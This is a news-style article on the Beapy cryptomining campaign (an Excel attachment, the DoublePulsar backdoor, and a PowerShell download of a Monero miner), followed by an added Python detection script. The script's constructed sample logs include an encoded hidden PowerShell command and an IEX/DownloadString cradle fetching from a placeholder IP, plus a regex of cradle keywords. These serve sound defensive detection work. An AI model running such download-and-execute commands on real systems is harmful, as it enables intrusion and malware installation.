Monero is in the spotlight again, and this time, unfortunately, the coin is associated with malware-based mining.
A dangerous wave of cryptomining malware has struck the web.
Infecting thousands of enterprises in Asia
The campaign has already infected thousands of high-value enterprises across Asia.
The malware is known as Beapy, and it uses leaked NSA exploits together with stolen credentials to spread through exposed networks as quickly as possible.
According to The Next Web, the stolen credentials also let the malware reach machines that have been patched against the exploits.
Cybersecurity company Symantec, which has been tracking the threat, reports that Beapy is a file-based coinminer that uses email as its initial infection vector.
“This campaign demonstrates that while crypto-jacking has declined in popularity with cyber criminals since its peak at the start of 2018, it is still a focus for some of them, with enterprises now their primary target,” Symantec says.
Symantec first recorded Beapy back in January 2019, and it typically infects via email. Activity has reportedly increased since the beginning of March.
Because it runs as a file-based miner on the host rather than as a script in the browser, Beapy mines Monero (XMR) faster than browser-based miners such as Coinhive.
How does this work?
The Next Web explains the infection chain. Beapy's initial attack vector is a malicious Excel spreadsheet distributed as an email attachment.
If the recipient opens the attachment, it downloads a second-stage payload: DoublePulsar, the leaked NSA-built backdoor.
DoublePulsar is the same tool used in the WannaCry ransomware outbreak that shook the world in 2017.
Once installed, DoublePulsar opens a backdoor on the infected machine that lets the attackers execute commands on it.
Symantec notes that “Once DoublePulsar is installed, a PowerShell command is executed, and contact is made with the Beapy command and control server before a coinminer is downloaded onto the target computer.”
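The chain described above (Excel attachment, then DoublePulsar, then a PowerShell command that reaches out for the miner) leaves a recognisable footprint in process-creation telemetry. The following is an added example written for this article, not code from Symantec, The Next Web or the Beapy operators: it runs two generic detection rules over constructed Sysmon-style process-creation records (field names ParentImage, Image and CommandLine are assumed to follow Sysmon Event ID 1). The rules, an Office application spawning a shell and PowerShell invoked with an encoded command or a download cradle, are general indicators of this kind of chain, not Beapy-specific signatures, and the log lines, hostnames and the 192.0.2.10 address are all constructed for the example.

```python
"""Flag the Office-to-PowerShell and PowerShell-download steps of a
Beapy-style infection chain in process-creation logs.

Added example for illustration; not the article's or Symantec's code.
"""
import json
import re

# Constructed Sysmon-style (Event ID 1) process-creation records, one JSON
# object per line. Hosts, timestamps, paths and the 192.0.2.10 address are
# all made up; the base64 blob is a truncated placeholder, not real payload.
SAMPLE_LOG = r"""
{"host": "ws01", "ts": "2019-03-04T09:12:01Z", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"host": "ws01", "ts": "2019-03-04T09:11:40Z", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "EXCEL.EXE C:\\Users\\alice\\Downloads\\invoice.xls"}
{"host": "ws02", "ts": "2019-03-04T09:15:22Z", "ParentImage": "C:\\Windows\\System32\\lsass.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')\""}
{"host": "ws03", "ts": "2019-03-04T09:20:05Z", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"}
"""

# Office applications that should never need to launch a shell interpreter.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Interpreters commonly launched by malicious documents.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}
# Encoded-command switches and download cradles typical of a PowerShell stager.
CRADLE_RE = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|\biex\b)", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Parse one JSON record per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event):
    """Return the list of rule names that fire on one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    # Rule 1: an Office app spawning a shell (the malicious-attachment step).
    if parent in OFFICE_APPS and image in SHELLS:
        reasons.append(f"office-spawned-shell:{parent}->{image}")
    # Rule 2: PowerShell with an encoded command or a download cradle (the
    # post-DoublePulsar step that fetches the coinminer). The parent does not
    # matter here because the backdoor, not Office, issues that command.
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmdline):
        reasons.append("powershell-download-cradle")
    return reasons


def find_suspicious(text):
    """Run both rules over a log and return the events that fired, in order."""
    hits = []
    for event in parse_events(text):
        reasons = classify(event)
        if reasons:
            hits.append({"host": event.get("host"), "ts": event.get("ts"),
                         "image": basename(event.get("Image", "")),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["host"], hit["ts"], hit["image"], ", ".join(hit["reasons"]))
```

On the constructed sample, the first record fires both rules (Excel launching an encoded PowerShell command), the third fires only the cradle rule (PowerShell pulling a script from a remote host under a non-Office parent), and the two benign records are left alone. In a real deployment the same two rules would be expressed in the SIEM's own query language; the point of the example is which parent/child and command-line features the chain exposes, not the Python itself.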